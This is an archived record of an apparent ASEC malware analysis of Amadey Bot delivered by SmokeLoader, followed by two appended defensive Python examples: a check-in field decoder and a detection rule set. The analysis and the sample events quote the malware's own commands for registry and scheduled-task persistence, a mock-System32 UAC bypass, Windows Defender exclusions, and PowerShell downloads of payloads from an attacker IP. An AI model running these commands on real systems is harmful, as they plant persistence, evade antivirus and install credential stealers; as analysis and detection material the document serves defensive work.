{
	"id": "0853491c-2c7e-45c5-a5c5-267ab357a241",
	"created_at": "2026-04-06T00:08:42.226024Z",
	"updated_at": "2026-04-10T03:36:36.825494Z",
	"deleted_at": null,
	"sha1_hash": "0b80a7e24653868fbeef1bcdaa63e70c098b1316",
	"title": "Amadey Bot Being Distributed Through SmokeLoader - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1857135,
	"plain_text": "Amadey Bot Being Distributed Through SmokeLoader - ASEC\r\nBy ATCP\r\nPublished: 2022-07-10 · Archived: 2026-04-05 16:04:41 UTC\r\nAmadey Bot, a malware first discovered in 2018, steals information and installs additional malware on command from the attacker. Like other malware strains, it is sold on underground forums and has been used by a variety of attackers.\r\nThe ASEC analysis team previously described cases in which Amadey was used in attacks, in an ASEC blog post from 2019 (no English version available). Amadey was mainly used by the GandCrab operators to install ransomware, and by the TA505 group, known for Clop ransomware, to install FlawedAmmyy. The operators of the Fallout Exploit Kit and the Rig Exploit Kit are also known to have used Amadey.\r\nThe team has recently found Amadey being installed by SmokeLoader. SmokeLoader has been distributed continuously for the past several years and accounts for a high proportion of recent ASEC statistics. It is currently distributed through websites that lure users into downloading it disguised as software cracks and serial (key) generators.\r\nSmokeLoader offers a range of info-stealing features as plug-ins, but it is normally used as a downloader to install additional malware. When SmokeLoader runs, it injects its main bot into the running explorer process (explorer.exe), so the bot that performs the actual malicious behaviour operates inside explorer. The figure below shows an AhnLab ASD log of SmokeLoader, injected into explorer, downloading Amadey.\r\nWhen Amadey runs, it first copies itself to the Temp path below. It then registers the folder it resides in as the Startup folder so that it runs again after a reboot. 
It also has a feature to register itself in Task Scheduler to maintain persistence.\r\nAmadey Installation Path\r\n\u003e %TEMP%\\9487d68b99\\bguuwe.exe\r\nCommands registered for persistence (Startup folder override and Task Scheduler)\r\n\u003e cmd.exe /C REG ADD “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders” /f /v Startup /t REG_SZ /d %TEMP%\\9487d68b99\\\r\n\u003e schtasks.exe /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR “%TEMP%\\9487d68b99\\bguuwe.exe” /F\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 1 of 10\r\nAfter completing the steps above, the malware starts communicating with the C\u0026C server. The Fiddler log below shows Amadey communicating with the C\u0026C server, downloading the cred.dll plug-in to collect user environment information and send it to the C\u0026C server, and installing the RedLine info-stealer as an additional payload.\r\nThe malware collects information about the infected system before it connects to the C\u0026C server. This includes basic information such as the computer name and user name, as well as which anti-malware product is installed. Each item is sent to the C\u0026C server in the format shown in Table 1. The server can then reply with the URL of an additional malware strain for Amadey to download, which is what makes it operate as a downloader.\r\nItem | Data Example | Meaning\r\nid | 129858768759 | Infected system’s ID\r\nvs | 3.21 | Amadey version\r\nsd | 37bbd7 | Amadey ID\r\nos | 9 | Windows version (e.g. Windows 7 = 9, Windows 10 = 1, Windows Server 2012 = 4, Windows Server 2019 = 16)\r\nbi | 0 | Architecture (x86 = 0, x64 = 1)\r\nar | 0 | Admin privilege status (1 if the process has admin privileges)\r\npc | PCNAME | Computer name\r\nun | USERNAME | User name\r\ndm | DOMAINNAME | Domain name\r\nav | 0 | Installed anti-malware product (code, see Table 2)\r\nlv | 0 | Fixed at 0\r\nog | 1 | Fixed at 1\r\nTable 1. 
Data sent to the C\u0026C server\r\nTable 1 shows that the Amadey version discussed in this post is 3.21. Accessing the C\u0026C panel of this version shows that it differs slightly from the previous one.\r\nAmong the items sent to the C\u0026C server, “av” identifies the anti-malware product installed in the infected environment; each number is assigned to a particular product. Because ‘13’ is chosen when the infected environment is Windows 10 or Windows Server 2019, that number is likely reserved for Windows Defender.\r\nAnti-malware Name | Number\r\nX | 0\r\nAvast Software | 1\r\nAvira | 2\r\nKaspersky Lab | 3\r\nESET | 4\r\nPanda Security | 5\r\nDr. Web | 6\r\nAVG | 7\r\n360 Total Security | 8\r\nBitdefender | 9\r\nNorton | 10\r\nSophos | 11\r\nComodo | 12\r\nWindows Defender (assumed) | 13\r\nTable 2. List of anti-malware products checked\r\nAmadey also periodically takes screenshots and sends them to the C\u0026C server. It captures the current screen as a JPG, saves it under the name “129858768759” (the same value as the id field in Table 1) in the %TEMP% path, and later uploads it to the C\u0026C server with a POST request.\r\nThe network traffic shown above includes “cred.dll”, meaning the malware downloaded a plug-in for stealing information. The plug-in, written in Delphi, is downloaded to the %APPDATA% path and run through rundll32.exe with its exported function Main as the entry point, as shown below.\r\n\u003e rundll32.exe %APPDATA%\\406d6c22b040c6\\cred.dll, Main\r\nThe information it steals includes e-mail, FTP and VPN client credentials, etc. 
The information collected is sent to the same C\u0026C server.\r\nInformation targeted by the info-stealing plug-in\r\n– MikroTik router management program Winbox\r\n– Outlook\r\n– FileZilla\r\n– Pidgin\r\n– Total Commander FTP client\r\n– RealVNC, TightVNC, TigerVNC\r\n– WinSCP\r\nThe Fiddler log mentioned above also shows Amadey installing additional malware from “hxxp://185.17.0[.]52/yuri.exe” besides the cred.dll plug-in. When Amadey periodically reports the infected system’s information to the C\u0026C server, the server usually replies with NULL data; depending on the operator’s instruction, however, it can reply with a download command. The download command is sent as encoded data, and decoding it yields the URL from which the additional malware is downloaded. The malware downloaded from this URL is the RedLine info-stealer.\r\nAccessing “hxxp://185.17.0[.]52/” shows a directory listing.\r\nThe table below describes each file. They include Amadey, RedLine, and the downloaders used to install them.\r\nName | Type\r\nProxy.exe | AutoIt downloader\r\na.exe | Amadey (unpacked original)\r\nama.exe | Amadey (a.exe with NULL data added)\r\nau.exe | Amadey (packed)\r\nbin | Amadey downloader (x64 DLL)\r\nxyz.exe | Downloader (installs bin)\r\nyuri.exe | RedLine info-stealer\r\nTable 3. List of malware strains\r\nxyz.exe and bin, the downloaders, are written in Rust. xyz.exe downloads bin and supports privilege escalation through a UAC bypass technique that abuses auto-elevation and the behaviour of the Application Information Service (AIS). An auto-elevating program is one whose manifest carries the “\u003cautoElevate\u003etrue\u003c/autoElevate\u003e” property, as shown below. 
If certain conditions are met, such a program runs with admin privileges without a UAC prompt.\r\nBesides carrying that manifest property, the program must be launched from a trusted location such as System32. The malware therefore creates the folder “C:\\Windows \\System32\\” (note the space after “Windows”; the \\\\?\\ prefix in the command below is what lets a name with a trailing space be created, since ordinary Win32 path handling trims it) and copies the auto-elevating program “FXSUNATD.exe” into it. AIS ignores whitespace when it checks the caller’s path internally, so “FXSUNATD.exe” launched from this mock folder is treated as if it had been run from the real System32 path. The path check passes and the program is auto-elevated to admin privileges.\r\n\u003e powershell.exe “New-Item -ItemType Directory ‘\\\\?\\C:\\Windows \\System32’; Copy-Item -Path ‘C:\\Windows\\System32\\FXSUNATD.exe’ -Destination ‘C:\\Windows \\System32\\’; powershell -windowstyle hidden $ProgressPreference= ‘SilentlyContinue’; Invoke-WebRequest hxxp://185.17.0[.]52/bin -Outfile ‘C:\\Windows \\System32\\version.dll’”\r\n\u003e powershell.exe “Start-Process ‘C:\\Windows \\System32\\FXSUNATD.exe’”\r\nThe malware then downloads a malicious DLL named version.dll into the same folder. version.dll is a library that “FXSUNATD.exe” loads; because an application’s own directory is searched before System32 in the DLL search order, the copy placed beside “FXSUNATD.exe” is loaded instead of the legitimate one. This is DLL hijacking (search-order hijacking). By abusing it, the malware gets its own code loaded into a legitimate, auto-elevated program: it drops the malicious version.dll next to “FXSUNATD.exe” and then runs the executable.\r\nbin (version.dll), loaded and executed by “FXSUNATD.exe”, is a downloader that installs Amadey and RedLine. When it runs, it uses the Windows Defender Add-MpPreference cmdlet to register the %ALLUSERSPROFILE% folder (C:\\ProgramData) and the %LOCALAPPDATA% directory, which contains the Temp directory, as exclusions. 
It then downloads and runs each payload.\r\n\u003e powershell -windowstyle hidden Add-MpPreference -ExclusionPath C:\\ProgramData\\; Add-MpPreference -ExclusionPath $env:TEMP\\; Add-MpPreference -ExclusionPath $env:LOCALAPPDATA\\\r\n\u003e powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/yuri.exe -OutFile $env:TEMP\\msconfig.exe;\r\n\u003e powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/ama.exe -OutFile $env:TEMP\\taskhost.exe\r\nAmadey was initially distributed through exploit kits; more recently it has been installed by SmokeLoader, which itself arrives from malicious websites disguised as download pages for cracks and serials of commercial software. Once installed, it can remain on the system to steal user information and download additional payloads. Users should apply the latest patches for the OS and for programs such as web browsers, and keep V3 up to date, to prevent infection in advance.\r\nAhnLab’s anti-malware software, V3, detects and blocks the malware above using the aliases below.\r\n[File Detection]\r\n– Trojan/Win.MalPE.R503126 (2022.07.07.01)\r\n– Trojan/Win.Amadey.C5196504 (2022.07.07.02)\r\n– Trojan/Win.Delf.R462350 (2022.01.04.02)\r\n– Trojan/Win.Generic.R503640 (2022.07.09.01)\r\n– Downloader/Win.AutoIt.C5200737 (2022.07.11.00)\r\n– Malware/Win.Trojanspy.R438708 (2021.08.25.01)\r\n– Trojan/Win.Amadey.C5200739 (2022.07.11.00)\r\n– Downloader/Win.Agent.C5198969 (2022.07.10.00)\r\n– Downloader/Win.Agent.C5198968 (2022.07.10.00)\r\n[Behavior Detection]\r\n– Malware/MDP.Download.M1197\r\n– Execution/MDP.Powershell.M2514\r\nMD5\r\n0f4351c43a09cb581dc01fe0ec08ff83\r\n0fd121b4a221c7767bd58f49c3d7cda5\r\n18bb226e2739a3ed48a96f9f92c91359\r\n27f626db46fd22214c1eb6c63193d2a0\r\n600bb5535d0bfc047f5c61f892477045\r\nAdditional IOCs are available on AhnLab 
TIP.\r\nURL\r\nhttp[:]//185[.]17[.]0[.]52/Proxy[.]exe\r\nhttp[:]//185[.]17[.]0[.]52/a[.]exe\r\nhttp[:]//185[.]17[.]0[.]52/ama[.]exe\r\nhttp[:]//185[.]17[.]0[.]52/au[.]exe\r\nhttp[:]//185[.]17[.]0[.]52/bin\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.\r\nSource: https://asec.ahnlab.com/en/36634/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/36634/"
	],
	"report_names": [
		"36634"
	],
	"threat_actors": [
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11",
				"GRACEFUL SPIDER",
				"SectorJ04",
				"Spandex Tempest",
				"TA505"
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434122,
	"ts_updated_at": 1775792196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0b80a7e24653868fbeef1bcdaa63e70c098b1316.pdf",
		"text": "https://archive.orkl.eu/0b80a7e24653868fbeef1bcdaa63e70c098b1316.txt",
		"img": "https://archive.orkl.eu/0b80a7e24653868fbeef1bcdaa63e70c098b1316.jpg"
	}
}
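Added example, appended after the record above; it is the editor's code, not ASEC's and not from the Amadey or SmokeLoader authors. It decodes the check-in fields listed in Table 1 and the anti-malware codes in Table 2 of the plain_text, the way a responder would over request bodies exported from a Fiddler or PCAP capture. It assumes, because the post shows only a screenshot of the traffic, that the fields travel as application/x-www-form-urlencoded key=value pairs; the sample bodies are constructed from the table's example values, and the Windows 10 / code 13 case reflects ASEC's stated assumption that 13 is Windows Defender. Unknown codes are reported as unknown rather than guessed.

```python
"""Decoder for the Amadey 3.21 check-in fields (Tables 1 and 2 of the ASEC
post). Added example, not ASEC's or the malware author's code.

Assumption (not stated in the post): the fields are sent as an
application/x-www-form-urlencoded POST body of key=value pairs.
"""
from urllib.parse import parse_qs

# Table 1: Windows version codes. Only the values the post lists are known.
OS_CODES = {
    "9": "Windows 7",
    "1": "Windows 10",
    "4": "Windows Server 2012",
    "16": "Windows Server 2019",
}

ARCH_CODES = {"0": "x86", "1": "x64"}

# Table 2: anti-malware codes. 0 is listed as "X" (no product); ASEC assumes
# 13 is Windows Defender because it is chosen on Windows 10 / Server 2019.
AV_CODES = {
    "0": "X (none listed)",
    "1": "Avast Software", "2": "Avira", "3": "Kaspersky Lab", "4": "ESET",
    "5": "Panda Security", "6": "Dr. Web", "7": "AVG", "8": "360 Total Security",
    "9": "Bitdefender", "10": "Norton", "11": "Sophos", "12": "Comodo",
    "13": "Windows Defender (assumed)",
}

# Every field of Table 1 must be present for the body to count as a check-in.
REQUIRED = ("id", "vs", "sd", "os", "bi", "ar", "pc", "un", "dm", "av", "lv", "og")


def decode_checkin(body: str) -> dict:
    """Turn a raw check-in body into labelled fields; codes not in the tables
    are kept as 'unknown code N' rather than guessed."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    missing = [k for k in REQUIRED if k not in fields]
    if missing:
        raise ValueError(f"not an Amadey 3.x check-in, missing fields: {missing}")
    return {
        "bot_id": fields["id"],  # the post's screenshot file name carries this value
        "version": fields["vs"],
        "build_id": fields["sd"],
        "os": OS_CODES.get(fields["os"], f"unknown code {fields['os']}"),
        "arch": ARCH_CODES.get(fields["bi"], f"unknown code {fields['bi']}"),
        "is_admin": fields["ar"] == "1",
        "computer": fields["pc"],
        "user": fields["un"],
        "domain": fields["dm"],
        "antivirus": AV_CODES.get(fields["av"], f"unknown code {fields['av']}"),
        # lv and og are fixed at 0 and 1 in this version; anything else
        # suggests a different build or a tampered body.
        "constants_ok": fields["lv"] == "0" and fields["og"] == "1",
    }


# Constructed sample bodies built from the example values in Table 1.
SAMPLE_WIN7 = ("id=129858768759&vs=3.21&sd=37bbd7&os=9&bi=0&ar=0"
               "&pc=PCNAME&un=USERNAME&dm=DOMAINNAME&av=0&lv=0&og=1")
SAMPLE_WIN10 = ("id=129858768759&vs=3.21&sd=37bbd7&os=1&bi=1&ar=1"
                "&pc=PCNAME&un=USERNAME&dm=&av=13&lv=0&og=1")

if __name__ == "__main__":
    for body in (SAMPLE_WIN7, SAMPLE_WIN10):
        for key, value in decode_checkin(body).items():
            print(f"{key:13} {value}")
        print()
```

Feeding a body whose lv or og differ from the fixed values, or whose os/av codes are outside the tables, is the quickest way to spot a newer Amadey build in a capture before spending time on the sample itself.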
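Added example, appended after the record above; it is the editor's code, not ASEC's. It is detection logic for the installation chain the post describes, run over constructed process-creation records. The image-path check emulates the behaviour the post attributes to AIS, ignoring whitespace inside path components, so that a launch from the mock folder “C:\Windows \System32\” is flagged precisely because it collapses to the real System32 path while not being byte-for-byte equal to it; a naive string match against C:\Windows\System32 would miss it. The command-line rules cover the Add-MpPreference exclusions, the one-minute schtasks job, the User Shell Folders Startup override, the rundll32 plug-in launch from %APPDATA% and the Invoke-WebRequest downloads into %TEMP%. The record field names (image, cmdline) and the sample events, abbreviated from the commands the post quotes, are constructed for this example.

```python
"""Detection logic for the Amadey / SmokeLoader installation chain described
in the ASEC post. Added example by the editor, not ASEC's code.

Records are constructed in a Sysmon-like shape {"image": ..., "cmdline": ...};
the field names are an assumption, not a format the post documents.
"""
import ntpath
import re

TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


def _strip_prefix(path: str) -> str:
    # Drop the \\?\ extended-length prefix. The malware needs it to create a
    # folder with a trailing space; ordinary Win32 path handling trims it.
    path = path.strip().lower().replace("/", "\\")
    return path[4:] if path.startswith("\\\\?\\") else path


def collapse_whitespace(path: str) -> str:
    # Emulates the check the post attributes to AIS: whitespace inside path
    # components is ignored, so "C:\Windows \System32" becomes C:\Windows\System32.
    return "\\".join(part.strip() for part in _strip_prefix(path).split("\\"))


def is_mock_trusted_dir(image_path: str) -> bool:
    """True when the image lives in a folder that AIS would treat as trusted
    but which is not byte-for-byte the trusted folder (the mock directory)."""
    raw_dir = ntpath.dirname(_strip_prefix(image_path))
    collapsed_dir = ntpath.dirname(collapse_whitespace(image_path))
    return collapsed_dir in TRUSTED_DIRS and raw_dir != collapsed_dir


# Command-line rules for the other steps the post lists; all case-insensitive.
RULES = [
    ("mock_system32_path", re.compile(r"\\windows\s+\\system32", re.I)),
    ("defender_exclusion", re.compile(r"add-mppreference\b.*-exclusion(path|process|extension)", re.I)),
    ("minute_schtask", re.compile(r"schtasks(\.exe)?\b.*/sc\s+minute\s+/mo\s+1\b", re.I)),
    ("startup_folder_override", re.compile(r"reg(\.exe)?\s+add\b.*user shell folders.*/v\s+startup\b", re.I)),
    ("rundll32_appdata_dll", re.compile(r"rundll32(\.exe)?\s+.*appdata.*\.dll\s*,\s*\w+", re.I)),
    ("download_to_temp", re.compile(r"invoke-webrequest\b.*-outfile\s+\$env:(temp|localappdata|appdata)\\", re.I)),
]


def scan_event(event: dict) -> set:
    """Return the names of every rule the record trips (empty set if none)."""
    hits = set()
    if is_mock_trusted_dir(event.get("image", "")):
        hits.add("mock_trusted_dir_image")
    cmdline = event.get("cmdline", "")
    hits.update(name for name, rule in RULES if rule.search(cmdline))
    return hits


def scan(events) -> list:
    return [(event["image"], sorted(scan_event(event))) for event in events]


# Constructed records, abbreviated from the commands quoted in the post.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d %TEMP%\9487d68b99'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "%TEMP%\9487d68b99\bguuwe.exe" /F'},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe %APPDATA%\406d6c22b040c6\cred.dll, Main"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe New-Item -ItemType Directory '\\?\C:\Windows \System32'; Copy-Item -Path 'C:\Windows\System32\FXSUNATD.exe' -Destination 'C:\Windows \System32'"},
    {"image": r"C:\Windows \System32\FXSUNATD.exe",
     "cmdline": r"C:\Windows \System32\FXSUNATD.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -windowstyle hidden Add-MpPreference -ExclusionPath C:\ProgramData\; Add-MpPreference -ExclusionPath $env:TEMP\; Add-MpPreference -ExclusionPath $env:LOCALAPPDATA"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/yuri.exe -OutFile $env:TEMP\msconfig.exe"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},  # benign control
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image:55} {', '.join(hits) or '-'}")
```

The image check is the one worth carrying into a real rule set: compare the raw path and the whitespace-collapsed path component by component, and alert when only the collapsed form lands in a trusted directory. The same comparison catches a trailing space on any component, not just after “Windows”.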